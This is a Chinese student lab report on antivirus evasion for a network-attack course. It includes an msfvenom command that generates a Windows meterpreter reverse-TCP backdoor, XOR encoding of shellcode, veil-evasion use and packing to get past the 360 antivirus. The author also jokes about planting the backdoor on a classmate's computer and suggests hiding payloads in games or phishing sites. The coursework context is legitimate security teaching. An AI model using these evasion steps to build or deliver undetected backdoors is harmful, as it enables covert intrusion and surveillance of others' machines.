20154307《網絡對抗》Exp3 免殺原理與實踐

一、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

基於特征碼的檢測：殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配，就會把該程序當作惡意軟件。

啟發式惡意軟件檢測

基於行為的惡意軟件檢測：檢測程序是否會有一些惡意行為，如修改註冊表，更改權限等等。。

（2）免殺是做什麽？

讓攻擊程序不被殺軟查殺

（3）免殺的基本方法有哪些？

加殼

改變特征碼

二、實踐內容

1、使用msf生成後門程序的檢測

由於上一個實驗我們已經用msf生成了一個後門程序，於是我就直接用上一個後門來檢測

當然。。。結果是不容樂觀的，畢竟上次的實驗是在關閉殺軟和防火墻的情況下做的。。。。

360也無情查殺。。

用msf多次編譯檢測結果也好，這裏我就沒有截圖。。。。

2、使用veil-evasion生成後門程序的檢測

首先啊，這個部分之前，我們要先安裝veil-evasion

sudo apt-get install veil-evasion這個命令，安裝之。。。

（過程中，下載速度和安裝速度實在無力吐槽。。。。心累）

下載安裝好以後，我們在終端輸入veil

輸入use 1進入如下界面

輸入list，查看payload模板，嗯，挺多的，有41個。。。

這裏我選擇了6

如下圖我更改了端口號和IP地址

我把它命名為4307

檢測該文件，稍微好了一點，不枉我下載和安裝了那麽久的veil

360依然無情。。。。。

3、利用shellcode編寫後門程序的檢測

在終端輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=端口號 -f exe > met.exe

把這段機器指令復制下來

我首先在linux情況下，生成了exe

檢測結果不是很樂觀啊。。。

360也攔截了他

於是我在用codeblocks做了一遍，生成的exe檢測結果比linux稍微好了一些

同時，360淪陷了，哈哈哈

4、將shellcode異或

我把之前復制出來的機器指令，和43異或，這個可以在codeblocks實現。

把異或的結果輸入buf，然後在主函數中將其在此異或

大概就像上圖那樣。。。。。這個我是在linux下完成的。。

生成的exe檢測。。結果。。。。。並沒有我想象中那麽好。。。

然後我用了codeblock。。。發現比linux下好一些。。。

我把異或的數字換成了17，發現結果稍微好了一些。。。。（這個是在codeblocks上做的）

當然，對shellcode的修改不止有異或，我們還可以逆序，或者把異或和逆序結合，我想這樣可能報病毒的概率會更低。。。但由於時間有限，我也沒做更多的嘗試。。。。。。

以上三個exe，360全部陣亡。。。。。，以下是我的回連結果。。。

可以回連的。。想到上一次實驗的窺屏。。。。。。。把這個植入同學的電腦。。。嘿嘿嘿。。

5、加殼

我把上一次veil生成的exe，加了殼。。。。額。。。

下面這個是加殼之前的。。。。。

崩潰了，邊上的同學加殼以後報病毒是0。。。0。。。。

綜上，這次實驗就做完了。。

三、離實戰還缺些什麽技術或步驟？

我覺得shellcode的異或已經可以欺騙一部分用戶了，例如360的用戶。雖然報病毒的概率還有待降低。當然，把攻擊程序裝入靶機還是需要一定的技術的，例如把他藏在一個什麽遊戲之下（貪玩藍月），或是一些釣魚網站。。。。然後隨著殺毒軟件的庫在不斷更新，我們的技術也不能一直使用，也要同時去更新。

四、實驗總結與體會

360確實不夠厲害，而且我們也不能完全把電腦的安全依賴於殺軟，殺軟只能用於病毒的防範，病毒的防範，還是要看自己，在上網，玩遊戲的時候要有安全意識。

同時，我們做的免殺還是比較基礎的，在免殺的制作和防範上，我們要走的路還是很遠的。。。。

嗯，這次實驗還是很有意思的。。。。

20154307《網絡對抗》Exp3 免殺原理與實踐